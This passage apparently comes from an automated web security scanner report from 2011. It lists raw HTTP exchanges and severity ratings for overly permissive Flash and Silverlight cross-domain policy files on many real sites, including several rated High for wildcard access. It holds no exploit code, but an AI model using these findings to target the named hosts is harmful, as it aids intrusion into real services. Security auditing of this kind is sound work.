HTTP/1.0 200 OK Date: Sun, 04 Sep 2011 01:23:44 GMT Server: Apache/1.3.41 Vary: Accept-Encoding Last-Modified: Thu, 17 Dec 2009 22:05:10 GMT ETag: "ea0d60-df-4b2aab16" Accept-Ranges: bytes Content-Length: 223 Content-Type: application/xml Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.charlotteobserver.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://search2.sacbee.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: search2.sacbee.com |
HTTP/1.0 200 OK Date: Sun, 04 Sep 2011 01:23:50 GMT Server: Apache/1.3.41 Vary: Accept-Encoding Last-Modified: Mon, 15 Aug 2011 23:32:59 GMT ETag: "a12c7f-175-4e49acab" Accept-Ranges: bytes Content-Length: 373 Content-Type: application/xml Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*.sacbee.com"/> <allow-access-from domain="*.mcclatchyinteractive <allow-access-from domain="*.vmixcore.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://snas.nbcuni.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: snas.nbcuni.com |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 00:49:58 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30 Last-Modified: Fri, 17 Dec 2010 18:25:22 GMT ETag: "2c9cd-58b-4979f4b136880" Accept-Ranges: bytes Content-Length: 1419 Cache-Control: max-age=10 Expires: Sun, 04 Sep 2011 00:50:08 GMT Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://static.ak.fbcdn |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: static.ak.fbcdn.net |
HTTP/1.0 200 OK Content-Type: text/x-cross-domain X-FB-Server: 10.30.146.199 X-Cnection: close Date: Sun, 04 Sep 2011 01:12:40 GMT Content-Length: 1527 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="s-static.facebook.com" /> <allow-access-from domain="static.facebook.com" /> <allow-access-from domain="static.api.ak.facebook <allow-access-from domain="*.static.ak.facebook.com" /> <allow-access-from domain="s-static.thefacebook.com" /> <allow-access-from domain="static.thefacebook.com" /> <allow-access-from domain="static.api.ak.thefacebook <allow-access-from domain="*.static.ak.thefacebook <allow-access-from domain="*.static.ak.fbcdn.com" /> <allow-access-from domain="s-static.ak.fbcdn.net" /> <allow-access-from domain="*.static.ak.fbcdn.net" /> <allow-access-from domain="s-static.ak.facebook.com" /> <allow-access-from domain="www.facebook.com" /> <allow-access-from domain="www.new.facebook.com" /> <allow-access-from domain="register.facebook.com" /> <allow-access-from domain="login.facebook.com" /> <allow-access-from domain="ssl.facebook.com" /> <allow-access-from domain="secure.facebook.com" /> <allow-access-from domain="ssl.new.facebook.com" /> ...[SNIP]... <allow-access-from domain="fvr.facebook.com" /> <allow-access-from domain="www.latest.facebook.com" /> <allow-access-from domain="www.inyour.facebook.com" /> <allow-access-from domain="www.beta.facebook.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://syndication.mmismm |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.1 Host: syndication.mmismm.com Proxy-Connection: keep-alive Referer: http://s3.cinesport.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:12:23 GMT Server: Apache Last-Modified: Mon, 25 Jul 2011 02:22:10 GMT ETag: "10e-4a8db7b7df880" Accept-Ranges: bytes Content-Length: 270 Keep-Alive: timeout=300 Connection: Keep-Alive Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.adap.tv"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.careerbuilder |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.careerbuilder.com |
HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/xml Last-Modified: Thu, 19 May 2011 19:43:17 GMT Accept-Ranges: bytes ETag: "d89fcdff5c16cc1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET X-PBY: BEAR9 Date: Sun, 04 Sep 2011 01:25:12 GMT Connection: close Content-Length: 842 ...<?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.careerbuilder.com" /> <allow-access-from domain="img.icbdr.com" /> <allow-access-from domain="img.cbdr.com" /> <allow-access-from domain="*.icbdr.com" /> <allow-access-from domain="*.cbdr.com" /> <allow-access-from domain="*.jobbguiden.se" /> <allow-access-from domain="*.jobbingmall.nl" /> <allow-access-from domain="*.careerbuilder.de" /> <allow-access-from domain="*.careerbuilder.no" /> <allow-access-from domain="*.careerbuilder.ch" /> <allow-access-from domain="*.kariera.gr" /> <allow-access-from domain="*.careerbuilder.gr" /> <allow-access-from domain="*.careerbuilder.fr" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.cars.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.cars.com |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:25:11 GMT Server: IBM_HTTP_Server Last-Modified: Thu, 14 May 2009 14:15:36 GMT ETag: "9c4f-27a-f632f200" Accept-Ranges: bytes Content-Length: 634 P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND" Connection: close Content-Type: text/xml Set-Cookie: cars_persist=3963688108 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*.cars.com" /> <allow-access-from domain="*.brightcove.com" /> <allow-access-from domain="*.2o7.net" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.charlotte |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.charlotteobserver.com |
HTTP/1.0 200 OK Server: Apache/1.3.41 Last-Modified: Thu, 17 Dec 2009 22:05:10 GMT ETag: "ea0d60-df-4b2aab16" Content-Type: application/xml Cache-Control: max-age=531 Date: Sun, 04 Sep 2011 01:00:13 GMT Content-Length: 223 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.charlotteobserver.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.facebook.com |
HTTP/1.0 200 OK Content-Type: text/x-cross-domain X-FB-Server: 10.64.198.64 Connection: close Content-Length: 1527 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="s-static.facebook.com" /> <allow-access-from domain="static.facebook.com" /> <allow-access-from domain="static.api.ak.facebook <allow-access-from domain="*.static.ak.facebook.com" /> <allow-access-from domain="s-static.thefacebook.com" /> <allow-access-from domain="static.thefacebook.com" /> <allow-access-from domain="static.api.ak.thefacebook <allow-access-from domain="*.static.ak.thefacebook <allow-access-from domain="*.static.ak.fbcdn.com" /> <allow-access-from domain="s-static.ak.fbcdn.net" /> <allow-access-from domain="*.static.ak.fbcdn.net" /> <allow-access-from domain="s-static.ak.facebook.com" /> ...[SNIP]... <allow-access-from domain="www.new.facebook.com" /> <allow-access-from domain="register.facebook.com" /> <allow-access-from domain="login.facebook.com" /> <allow-access-from domain="ssl.facebook.com" /> <allow-access-from domain="secure.facebook.com" /> <allow-access-from domain="ssl.new.facebook.com" /> <allow-access-from domain="static.ak.fbcdn.net" /> <allow-access-from domain="fvr.facebook.com" /> <allow-access-from domain="www.latest.facebook.com" /> <allow-access-from domain="www.inyour.facebook.com" /> <allow-access-from domain="www.beta.facebook.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.fansonly.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.fansonly.com |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:26:17 GMT Server: Apache P3P: policyref="http://www Last-Modified: Tue, 30 Aug 2011 23:41:52 GMT Accept-Ranges: bytes Content-Length: 909 Connection: close Content-Type: application/xml <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*.fansonly.com" /> <allow-access-from domain="*.initinteractive.com" /> <allow-access-from domain="174.132.109.106" /> <allow-access-from domain="*.cstv.com" /> <allow-access-from domain="*.ocsn.com" /> <allow-access-from domain="*.collegesports.com" /> <allow-access-from domain="livestats.*.fansonly.com" /> <allow-access-from domain="livestats.*.cstv.com" /> <allow-access-from domain="livestats.*.collegesports <allow-access-from domain="*.rolltide.com" /> <allow-access-from domain="*.ucirvinesports.com" /> <allow-access-from domain="*.doubleclick.net" secure="false" /> ...[SNIP]... <allow-access-from domain="*.2mdn.net" secure="false" /> ...[SNIP]... <allow-access-from domain="*.cbs.com" /> <allow-access-from domain="flv.sales.cbs.com" secure="false" /> ...[SNIP]... <allow-access-from domain="mediapm.edgesuite.net" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.foxsports |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.foxsportssouthwest |
HTTP/1.0 200 OK Server: nginx/1.0.3 Content-Type: application/xml Last-Modified: Mon, 08 Nov 2010 18:43:43 GMT ETag: "1f2f8aa-d9-4948f00e3b5c0 Accept-Ranges: bytes Content-Length: 217 Date: Sun, 04 Sep 2011 01:26:09 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*.edgecastcdn.net" /> <allow-access-from domain="*.brandaffinity.net" /> <allow-access-from domain="*.netbat.com" /> </cro ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.latimes.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.latimes.com |
HTTP/1.0 200 OK Server: Sun-ONE-Web-Server/6.1 Content-Length: 438 Content-Type: text/xml P3P: policyref="http://www Last-Modified: Thu, 03 Mar 2011 02:18:58 GMT ETag: "1b6-4d6efa92" Accept-Ranges: bytes Date: Sun, 04 Sep 2011 01:26:15 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.wp.com"/> <allow-access-from domain="s-ssl.wordpress.com"/> <allow-access-from domain="latimesphoto.wordpress <allow-access-from domain="framework.latimes.com"/> <allow-access-from domain="*.brightcove.com" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.myspace.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.myspace.com |
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate, proxy-revalidate Pragma: no-cache Content-Type: text/xml Expires: -1 Last-Modified: Thu, 01 Sep 2011 03:28:02 GMT Accept-Ranges: bytes ETag: "0d70275768cc1:0" Server: Microsoft-IIS/7.5 X-Server: 979f881f10211383746f X-PoweredBy: Chunk from Goonies Date: Sun, 04 Sep 2011 01:26:20 GMT Connection: keep-alive Content-Length: 680 X-Vertical: profileidentities <cross-domain-policy> <allow-access-from domain="*.fimservecdn.com" /> <allow-access-from domain="lads.myspace.cn" /> <allow-access-from domain="*.ilike.com" /> <allow-http-request ...[SNIP]... <allow-access-from domain="*.myspacecdn.com" /> <allow-access-from domain="*.myspace.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.reuters.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.reuters.com |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 00:44:42 GMT Server: Apache-Coyote/1.1 Expires: Sun, 04 Sep 2011 00:49:42 GMT browser-expires: Sun, 4 Sep 2011 00:44:42 GMT Content-Type: text/xml;charset=UTF-8 Content-Length: 857 Vary: Accept-Encoding Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.reuters.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.reutersmedia.net" secure="false"/> ...[SNIP]... <allow-access-from domain="ad.doubleclick.net" secure="false"/> ...[SNIP]... <allow-access-from domain="ad.uk.doubleclick.net" secure="false"/> ...[SNIP]... <allow-access-from domain="m.2mdn.net" secure="false"/> ...[SNIP]... <allow-access-from domain="m2.2mdn.net" secure="false"/> ...[SNIP]... <allow-access-from domain="feedroom.com" secure="false"/> ...[SNIP]... <allow-access-from domain="creatives.doubleclick.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.cooliris.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.oho.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.metacarta.com" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.sacbee.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.sacbee.com |
HTTP/1.0 200 OK Last-Modified: Mon, 15 Aug 2011 23:32:59 GMT ETag: "a12c7f-175-4e49acab" Server: Apache/1.3.41 Content-Type: application/xml Cache-Control: max-age=175 Date: Sun, 04 Sep 2011 00:57:44 GMT Content-Length: 373 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*.sacbee.com"/> <allow-access-from domain="*.mcclatchyinteractive <allow-access-from domain="*.vmixcore.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.sologig.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.sologig.com |
HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/xml Last-Modified: Thu, 19 May 2011 19:43:17 GMT Accept-Ranges: bytes ETag: "d89fcdff5c16cc1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET X-PBY: REBEL39 Date: Sun, 04 Sep 2011 01:27:38 GMT Connection: close Content-Length: 842 ...<?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.careerbuilder.com" /> <allow-access-from domain="img.icbdr.com" /> <allow-access-from domain="img.cbdr.com" /> <allow-access-from domain="*.icbdr.com" /> <allow-access-from domain="*.cbdr.com" /> <allow-access-from domain="*.jobbguiden.se" /> <allow-access-from domain="*.jobbingmall.nl" /> <allow-access-from domain="*.careerbuilder.de" /> <allow-access-from domain="*.careerbuilder.no" /> <allow-access-from domain="*.careerbuilder.ch" /> <allow-access-from domain="*.kariera.gr" /> <allow-access-from domain="*.careerbuilder.gr" /> <allow-access-from domain="*.careerbuilder.fr" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.stumbleupon |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.stumbleupon.com |
HTTP/1.1 200 OK Server: Apache Last-Modified: Mon, 18 Oct 2010 23:10:01 GMT Content-Type: application/xml Content-Length: 460 Date: Sun, 04 Sep 2011 01:27:58 GMT Age: 0 Via: 1.1 varnish Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="www.stumbleupon <allow-access-from domain="*.stumble.net" /> <allow-access-from domain="stumble.net" /> <allow-access-from domain="*.stumbleupon.com" /> <allow-access-from domain="stumbleupon.com" /> <allow-access-from domain="cdn.stumble-upon.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.tsn.ca |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.tsn.ca |
HTTP/1.1 200 OK Cache-Control: max-age=3600 Content-Type: text/xml Last-Modified: Tue, 16 Aug 2011 18:52:44 GMT Accept-Ranges: bytes ETag: "f5ca3faf455ccc1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 04 Sep 2011 01:28:28 GMT Connection: close Content-Length: 820 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="watch.tsn.ca" /> <allow-access-from domain="watch.ctv.ca" /> <allow-access-from domain="*.tsn.ca" /> <allow-access-from domain="tsn.ca" /> <allow-access-from domain="*.ctvdigital.com" /> <allow-access-from domain="*.ctvdigital.ca" /> <allow-access-from domain="images.tsn.ca.edgesuite <allow-access-from domain="*.mtv.ca" /> <allow-access-from domain="*.edgefcs.net" /> <allow-access-from domain="ads.itravel2000.com"/> <allow-access-from domain="*.curltv.com"/> <allow-access-from domain="*.daelgren.com"/> <allow-access-from domain="*.streamtheworld.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.usatoday.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.usatoday.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Wed, 16 Mar 2011 20:16:43 GMT Accept-Ranges: bytes ETag: "59d64d1117e4cb1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Date: Sun, 04 Sep 2011 01:28:32 GMT Connection: close Content-Length: 1558 <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.usatoday.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.usatoday.net" secure="true"/> ...[SNIP]... <allow-access-from domain="projects.usatoday.com"/> <allow-access-from domain="*.gannettonline.com"/> <allow-access-from domain="www.smashingideas.com" secure="true"/> ...[SNIP]... <allow-access-from domain="beta.tagware.com" secure="true"/> ...[SNIP]... <allow-access-from domain="nmp.newsgator.com" secure="true"/> ...[SNIP]... <allow-access-from domain="maventechnologies.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.maventechnologies.com" secure="true"/> ...[SNIP]... <allow-access-from domain="mavenapps.net" secure="true"/> ...[SNIP]... <allow-access-from domain="*.mavenapps.net" secure="true"/> ...[SNIP]... <allow-access-from domain="hostlogic.ca" secure="true"/> ...[SNIP]... <allow-access-from domain="pages.samsung.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.pointroll.com" /> <allow-access-from domain="*.facebook.com" /> <allow-access-from domain="demo.pointroll.net" /> <allow-access-from domain="*.brightcove.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.metagrapher.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.wtp101.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.1 Host: www.wtp101.com Proxy-Connection: keep-alive Referer: http://s3.cinesport.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: max-age=86400 Content-Type: application/xml Date: Sun, 04 Sep 2011 01:12:32 GMT ETag: 1300113893320 LastModified: Mon, 14 Mar 2011 14:44:53 GMT P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Content-Length: 320 Connection: keep-alive <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*.adap.tv"/> <allow-access-from domain="*.nieuwefabia.nl"/> <allow-access-from domain="*.denieuwefabia.nl"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.youtube.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.youtube.com |
HTTP/1.0 200 OK Vary: Accept-Encoding Content-Type: text/x-cross-domain Last-Modified: Fri, 03 Jun 2011 20:25:01 GMT Date: Sun, 04 Sep 2011 01:28:37 GMT Expires: Sun, 04 Sep 2011 01:28:37 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block <?xml version="1.0"?> <!-- http://www.youtube.com <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.youtube.com" /> <allow-access-from domain="s.ytimg.com" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://admin6.testan |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: admin6.testandtarget |
HTTP/1.1 200 OK Server: Test & Target Content-Type: application/xml Date: Sun, 04 Sep 2011 01:21:50 GMT Accept-Ranges: bytes ETag: W/"313-1313024241000" Connection: close Set-Cookie: X-Mapping-obodhgke Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT Content-Length: 313 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="s7sps1.scene7.com"/> <allow-access-from domain="s7sps3.scene7.com"/> <allow-access-from domain="s7sps5.scene7.com"/> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://api.twitter.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: api.twitter.com |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 00:49:23 GMT Server: hi Status: 200 OK Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT Content-Type: application/xml Content-Length: 561 Cache-Control: max-age=1800 Expires: Sun, 04 Sep 2011 01:19:23 GMT Vary: Accept-Encoding Connection: close <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy xmlns:xsi="http://www.w3 <allow-access-from domain="twitter.com" /> ...[SNIP]... <allow-access-from domain="search.twitter.com" /> <allow-access-from domain="static.twitter.com" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://docs.google.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: docs.google.com |
HTTP/1.0 200 OK Expires: Sun, 04 Sep 2011 19:29:21 GMT Date: Sat, 03 Sep 2011 19:29:21 GMT Content-Type: text/x-cross-domain X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Cache-Control: public, max-age=86400 Age: 21186 <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://matcher-rbc |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: matcher-rbc.bidder7 |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:22:52 GMT Server: Apache/2.2.3 (Red Hat) Last-Modified: Sat, 27 Aug 2011 03:06:09 GMT ETag: "3cd8207-116-4ab73f1 Accept-Ranges: bytes Content-Length: 278 Connection: close Content-Type: text/xml <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy xmlns:xsi="http://www.w3 ...[SNIP]... <allow-access-from domain="zaptrader.themig.com" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://twitter.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: twitter.com |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:24:53 GMT Server: Apache Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT Accept-Ranges: bytes Content-Length: 561 Cache-Control: max-age=1800 Expires: Sun, 04 Sep 2011 01:54:53 GMT Vary: Accept-Encoding X-XSS-Protection: 1; mode=block Connection: close Content-Type: application/xml <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy xmlns:xsi="http://www.w3 <al ...[SNIP]... <allow-access-from domain="api.twitter.com" /> <allow-access-from domain="search.twitter.com" /> <allow-access-from domain="static.twitter.com" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.traffic.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.traffic.com |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:28:02 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b mod_jk/1.2.25 Last-Modified: Wed, 22 Apr 2009 22:26:16 GMT ETag: "a4b03-9d-4682c40737200" Accept-Ranges: bytes Content-Length: 157 Vary: User-Agent Connection: close Content-Type: application/xml <?xml version="1.0"?> <!-- http://www.wfaa.com <cross-domain-policy> <allow-access-from domain="www.wfaa.com" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: ad.doubleclick.net |
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 314 Last-Modified: Wed, 21 May 2008 19:54:04 GMT Date: Sun, 04 Sep 2011 01:21:13 GMT <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*"/> </allow-from> <grant-to> <resource ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: b.scorecardresearch.com |
HTTP/1.0 200 OK Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT Content-Type: application/xml Expires: Mon, 05 Sep 2011 00:42:17 GMT Date: Sun, 04 Sep 2011 00:42:17 GMT Content-Length: 320 Connection: close Cache-Control: private, no-transform, max-age=86400 Server: CS <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*" /> </allow-from> <grant-to> <resou ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://content.usatoday |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: content.usatoday.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Wed, 03 Mar 2010 16:58:39 GMT Accept-Ranges: bytes ETag: "80964c5f2baca1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Date: Sun, 04 Sep 2011 00:42:14 GMT Connection: close Content-Length: 730 <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers= <domain uri="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://metrics.sprint.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: metrics.sprint.com |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 00:53:11 GMT Server: Omniture DC/2.0.0 xserver: www614 Content-Length: 263 Keep-Alive: timeout=15 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://nmcharlotte.112 |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: nmcharlotte.112.2o7.net |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:06:25 GMT Server: Omniture DC/2.0.0 xserver: www86 Content-Length: 263 Keep-Alive: timeout=15 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pixel.quantserve |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: pixel.quantserve.com |
HTTP/1.0 200 OK Connection: close Cache-Control: private, no-transform, must-revalidate, max-age=86400 Expires: Mon, 05 Sep 2011 00:45:10 GMT Content-Type: text/xml Content-Length: 312 Date: Sun, 04 Sep 2011 00:45:10 GMT Server: QS <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*"/> </allow-from> <grant-to> <resour ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://s0.2mdn.net |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: s0.2mdn.net |
